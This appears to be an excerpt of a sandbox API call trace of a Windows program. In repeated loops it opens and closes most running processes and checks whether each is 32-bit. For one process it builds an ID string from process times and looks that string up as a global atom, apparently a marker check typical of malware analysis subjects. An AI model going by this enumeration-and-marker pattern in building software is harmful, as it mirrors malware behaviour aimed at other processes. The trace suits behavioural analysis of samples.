	[0105.634] CloseHandle (hObject=0x694) returned 1
	[0105.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.634] CloseHandle (hObject=0x694) returned 1
	[0105.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.634] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.634] CloseHandle (hObject=0x694) returned 1
	[0105.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.635] CloseHandle (hObject=0x694) returned 1
	[0105.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.635] CloseHandle (hObject=0x694) returned 1
	[0105.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.635] CloseHandle (hObject=0x694) returned 1
	[0105.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.635] CloseHandle (hObject=0x694) returned 1
	[0105.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.635] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.635] CloseHandle (hObject=0x694) returned 1
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.636] CloseHandle (hObject=0x694) returned 1
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.636] CloseHandle (hObject=0x694) returned 1
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.636] CloseHandle (hObject=0x694) returned 1
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.636] CloseHandle (hObject=0x694) returned 1
	[0105.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.636] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.637] CloseHandle (hObject=0x694) returned 1
	[0105.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.637] CloseHandle (hObject=0x694) returned 1
	[0105.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.637] CloseHandle (hObject=0x694) returned 1
	[0105.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.637] CloseHandle (hObject=0x694) returned 1
	[0105.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.637] CloseHandle (hObject=0x694) returned 1
	[0105.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.637] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.638] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.638] CloseHandle (hObject=0x694) returned 1
	[0105.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.639] CloseHandle (hObject=0x694) returned 1
	[0105.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.639] CloseHandle (hObject=0x694) returned 1
	[0105.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.639] CloseHandle (hObject=0x694) returned 1
	[0105.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.639] CloseHandle (hObject=0x694) returned 1
	[0105.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.640] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.640] CloseHandle (hObject=0x694) returned 1
	[0105.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.640] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.640] CloseHandle (hObject=0x694) returned 1
	[0105.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.640] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.640] CloseHandle (hObject=0x694) returned 1
	[0105.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.640] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.640] CloseHandle (hObject=0x694) returned 1
	[0105.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.641] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.641] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.641] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.641] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.642] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.642] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.642] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.642] CloseHandle (hObject=0x694) returned 1
	[0105.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.642] CloseHandle (hObject=0x694) returned 1
	[0105.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.642] CloseHandle (hObject=0x694) returned 1
	[0105.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.643] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.643] CloseHandle (hObject=0x694) returned 1
	[0105.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.681] CloseHandle (hObject=0x694) returned 1
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.682] CloseHandle (hObject=0x694) returned 1
	[0105.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.682] CloseHandle (hObject=0x694) returned 1
	[0105.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.682] CloseHandle (hObject=0x694) returned 1
	[0105.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.682] CloseHandle (hObject=0x694) returned 1
	[0105.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.682] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.682] CloseHandle (hObject=0x694) returned 1
	[0105.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.683] CloseHandle (hObject=0x694) returned 1
	[0105.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.683] CloseHandle (hObject=0x694) returned 1
	[0105.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.683] CloseHandle (hObject=0x694) returned 1
	[0105.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.683] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.683] CloseHandle (hObject=0x694) returned 1
	[0105.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.684] CloseHandle (hObject=0x694) returned 1
	[0105.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.684] CloseHandle (hObject=0x694) returned 1
	[0105.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.684] CloseHandle (hObject=0x694) returned 1
	[0105.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.684] CloseHandle (hObject=0x694) returned 1
	[0105.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.684] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.684] CloseHandle (hObject=0x694) returned 1
	[0105.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.685] CloseHandle (hObject=0x694) returned 1
	[0105.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.685] CloseHandle (hObject=0x694) returned 1
	[0105.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.685] CloseHandle (hObject=0x694) returned 1
	[0105.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.685] CloseHandle (hObject=0x694) returned 1
	[0105.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.686] CloseHandle (hObject=0x694) returned 1
	[0105.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.686] CloseHandle (hObject=0x694) returned 1
	[0105.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.686] CloseHandle (hObject=0x694) returned 1
	[0105.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.686] CloseHandle (hObject=0x694) returned 1
	[0105.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.686] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.686] CloseHandle (hObject=0x694) returned 1
	[0105.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.687] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.687] CloseHandle (hObject=0x694) returned 1
	[0105.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.687] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.687] CloseHandle (hObject=0x694) returned 1
	[0105.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.687] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.687] CloseHandle (hObject=0x694) returned 1
	[0105.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.687] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.687] CloseHandle (hObject=0x694) returned 1
	[0105.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.687] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.688] CloseHandle (hObject=0x694) returned 1
	[0105.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.688] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.688] CloseHandle (hObject=0x694) returned 1
	[0105.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.688] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.688] CloseHandle (hObject=0x694) returned 1
	[0105.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.688] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.689] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.689] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.689] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.690] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.690] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.690] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.690] CloseHandle (hObject=0x694) returned 1
	[0105.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.690] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.690] CloseHandle (hObject=0x694) returned 1
	[0105.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.690] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.690] CloseHandle (hObject=0x694) returned 1
	[0105.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.690] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.690] CloseHandle (hObject=0x694) returned 1
	[0105.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.731] CloseHandle (hObject=0x694) returned 1
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.731] CloseHandle (hObject=0x694) returned 1
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.732] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.732] CloseHandle (hObject=0x694) returned 1
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.732] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.732] CloseHandle (hObject=0x694) returned 1
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.732] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.732] CloseHandle (hObject=0x694) returned 1
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.732] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.732] CloseHandle (hObject=0x694) returned 1
	[0105.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.732] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.733] CloseHandle (hObject=0x694) returned 1
